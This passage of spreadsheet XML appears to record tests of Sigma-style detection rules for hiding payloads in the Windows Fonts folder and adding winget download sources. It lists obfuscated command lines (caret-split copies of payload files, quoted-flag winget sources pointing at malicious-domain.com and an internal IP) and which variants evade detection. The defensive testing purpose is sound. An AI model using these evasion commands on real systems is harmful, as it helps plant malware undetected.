        <v>1</v>
      </c>
      <c r="G1152" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1152" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1152" s="43" t="n"/>
      <c r="J1152" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1152" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1153" ht="15.75" customHeight="1" s="42">
      <c r="A1153" s="43" t="n"/>
      <c r="B1153" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1153" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1153" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1153" s="36" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F1153" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1153" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1153" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1153" s="43" t="n"/>
      <c r="J1153" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1153" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1154" ht="15.75" customHeight="1" s="42">
      <c r="A1154" s="43" t="n"/>
      <c r="B1154" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1154" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1154" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1154" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1154" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1154" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J1154" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1154" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1155" ht="15.75" customHeight="1" s="42">
      <c r="A1155" s="43" t="n"/>
      <c r="B1155" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1155" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1155" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1155" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1155" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1155" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J1155" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1155" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1156" ht="15.75" customHeight="1" s="42">
      <c r="A1156" s="43" t="n"/>
      <c r="B1156" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1156" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1156" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1156" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1156" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1156" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J1156" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1156" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1157" ht="15.75" customHeight="1" s="42">
      <c r="A1157" s="43" t="n"/>
      <c r="B1157" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1157" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1157" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1157" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.vbs C:\Windows\System32\..\Fonts\</t>
        </is>
      </c>
      <c r="F1157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1157" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1157" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1157" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1158" ht="15.75" customHeight="1" s="42">
      <c r="A1158" s="43" t="n"/>
      <c r="B1158" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1158" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1158" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1158" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.exe %SystemRoot%\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F1158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1158" s="43" t="n"/>
      <c r="J1158" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1158" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1159" ht="15.75" customHeight="1" s="42">
      <c r="A1159" s="43" t="n"/>
      <c r="B1159" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1159" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1159" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1159" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" -n CustomRepo -a https://example.com</t>
        </is>
      </c>
      <c r="F1159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1159" s="43" t="n"/>
      <c r="J1159" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1159" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1160" ht="15.75" customHeight="1" s="42">
      <c r="A1160" s="43" t="n"/>
      <c r="B1160" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1160" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1160" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1160" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" -"n" CustomRepo --accept-source-arms https://example.com</t>
        </is>
      </c>
      <c r="F1160" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1160" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1160" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1160" s="43" t="n"/>
      <c r="J1160" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1160" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1161" ht="15.75" customHeight="1" s="42">
      <c r="A1161" s="43" t="n"/>
      <c r="B1161" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1161" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1161" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1161" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" --no-deps CustomRepo -a https://example.com</t>
        </is>
      </c>
      <c r="F1161" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1161" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1161" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1161" s="43" t="n"/>
      <c r="J1161" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1161" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1162" ht="15.75" customHeight="1" s="42">
      <c r="A1162" s="43" t="n"/>
      <c r="B1162" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1162" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1162" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1162" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" --no-deps CustomRepo --accept-source-arms https://example.com</t>
        </is>
      </c>
      <c r="F1162" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1162" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1162" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1162" s="43" t="n"/>
      <c r="J1162" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1162" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1163" ht="15.75" customHeight="1" s="42">
      <c r="A1163" s="43" t="n"/>
      <c r="B1163" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1163" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1163" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1163" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" -"n" CustomRepo -a https://example.com</t>
        </is>
      </c>
      <c r="F1163" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1163" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1163" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1163" s="43" t="n"/>
      <c r="J1163" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1163" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1164" ht="15.75" customHeight="1" s="42">
      <c r="A1164" s="43" t="n"/>
      <c r="B1164" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1164" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1164" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1164" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" -"n" CustomRepo -"a" https://example.com</t>
        </is>
      </c>
      <c r="F1164" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1164" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1164" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1164" s="43" t="n"/>
      <c r="J1164" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1164" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1165" ht="15.75" customHeight="1" s="42">
      <c r="A1165" s="43" t="n"/>
      <c r="B1165" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1165" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1165" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1165" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" -"n" CustomRepo /"a" https://example.com</t>
        </is>
      </c>
      <c r="F1165" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1165" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1165" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1165" s="43" t="n"/>
      <c r="J1165" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1165" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1166" ht="15.75" customHeight="1" s="42">
      <c r="A1166" s="43" t="n"/>
      <c r="B1166" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1166" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1166" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1166" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" -N CustomRepo /"a" https://example.com</t>
        </is>
      </c>
      <c r="F1166" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1166" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1166" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1166" s="43" t="n"/>
      <c r="J1166" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1166" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1167" ht="15.75" customHeight="1" s="42">
      <c r="A1167" s="43" t="n"/>
      <c r="B1167" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1167" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1167" s="36" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1167" s="36" t="inlineStr">
        <is>
          <t>winget "source" "add" --no-deps CustomRepo -A https://example.com</t>
        </is>
      </c>
      <c r="F1167" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1167" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1167" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1167" s="43" t="n"/>
      <c r="J1167" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1167" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1168" ht="15.75" customHeight="1" s="42">
      <c r="A1168" s="43" t="n"/>
      <c r="B1168" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1168" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1168" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1168" s="36" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -n evader_repo -a "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1168" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1168" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1168" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1168" s="36" t="n"/>
      <c r="J1168" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1168" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1169" ht="15.75" customHeight="1" s="42">
      <c r="A1169" s="43" t="n"/>
      <c r="B1169" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1169" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1169" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1169" s="36" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" --no-deps evader_repo -"a" "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1169" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1169" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1169" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1169" s="36" t="n"/>
      <c r="J1169" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1169" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1170" ht="15.75" customHeight="1" s="42">
      <c r="A1170" s="43" t="n"/>
      <c r="B1170" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1170" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1170" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1170" s="36" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -N evader_repo --accept-source-arms "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1170" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1170" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1170" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1170" s="36" t="n"/>
      <c r="J1170" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1170" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1171" ht="15.75" customHeight="1" s="42">
      <c r="A1171" s="43" t="n"/>
      <c r="B1171" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1171" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1171" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1171" s="36" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -"n" evader_repo /"a" "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1171" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1171" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1171" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1171" s="36" t="n"/>
      <c r="J1171" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1171" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1172" ht="15.75" customHeight="1" s="42">
      <c r="A1172" s="43" t="n"/>
      <c r="B1172" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1172" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1172" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1172" s="36" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -n evader_repo -A "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1172" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1172" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1172" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1172" s="36" t="n"/>
      <c r="J1172" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1172" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1173" ht="15.75" customHeight="1" s="42">
      <c r="A1173" s="43" t="n"/>
      <c r="B1173" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1173" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1173" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1173" s="43" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -"n" evader_repo -a "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1173" s="43" t="n"/>
      <c r="J1173" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1173" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1174" ht="15.75" customHeight="1" s="42">
      <c r="A1174" s="43" t="n"/>
      <c r="B1174" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1174" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1174" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1174" s="43" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" /"n" evader_repo -"a" "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1174" s="43" t="n"/>
      <c r="J1174" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1174" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1175" ht="15.75" customHeight="1" s="42">
      <c r="A1175" s="36" t="n"/>
      <c r="B1175" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1175" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1175" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1175" s="36" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -n evader_repo --accept-source-arms "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1175" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1175" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1175" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1175" s="43" t="n"/>
      <c r="J1175" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1175" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1176" ht="15.75" customHeight="1" s="42">
      <c r="A1176" s="36" t="n"/>
      <c r="B1176" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1176" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1176" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1176" s="36" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" /"n" evader_repo -a "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1176" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1176" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1176" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1176" s="43" t="n"/>
      <c r="J1176" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1176" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1177" ht="15.75" customHeight="1" s="42">
      <c r="A1177" s="36" t="n"/>
      <c r="B1177" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1177" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1177" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1177" s="36" t="inlineStr">
        <is>
          <t>winget source add -n evadesource -a https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1177" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1177" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1177" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1177" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1177" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1178" ht="15.75" customHeight="1" s="42">
      <c r="A1178" s="36" t="n"/>
      <c r="B1178" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1178" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1178" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1178" s="36" t="inlineStr">
        <is>
          <t>winget source add -N evadesource /"a" https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1178" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1178" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1178" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1178" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1178" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1179" ht="15.75" customHeight="1" s="42">
      <c r="A1179" s="36" t="n"/>
      <c r="B1179" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1179" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1179" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1179" s="36" t="inlineStr">
        <is>
          <t>winget source add -n evadesource -"a" https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1179" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1179" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1179" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1179" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1179" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1180" ht="15.75" customHeight="1" s="42">
      <c r="A1180" s="36" t="n"/>
      <c r="B1180" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1180" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1180" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1180" s="36" t="inlineStr">
        <is>
          <t>winget source add --no-deps evadesource -"a" https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1180" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1180" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1180" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1180" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1180" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1181" ht="15.75" customHeight="1" s="42">
      <c r="A1181" s="36" t="n"/>
      <c r="B1181" s="36" t="inlineStr">
